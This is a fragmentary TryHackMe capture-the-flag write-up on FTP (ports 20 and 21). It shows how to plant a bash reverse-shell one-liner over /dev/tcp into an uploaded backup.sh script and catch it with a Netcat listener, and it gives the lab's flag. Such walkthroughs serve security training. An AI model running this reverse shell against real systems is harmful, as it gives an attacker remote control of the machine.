Anyone can be Santa!
Networking - FTP
Last updated
Was this helpful?
Networking - FTP
Last updated
Was this helpful?
The standard for these two connections are the two ports:
Port 20 (Data)
Port 21 (Commands)
bash -i >& /dev/tcp/Your_TryHackMe_IP/4444 0>&1
public
backup.sh
The Polar Express
Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have set up a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.
THM{even_you_can_be_santa}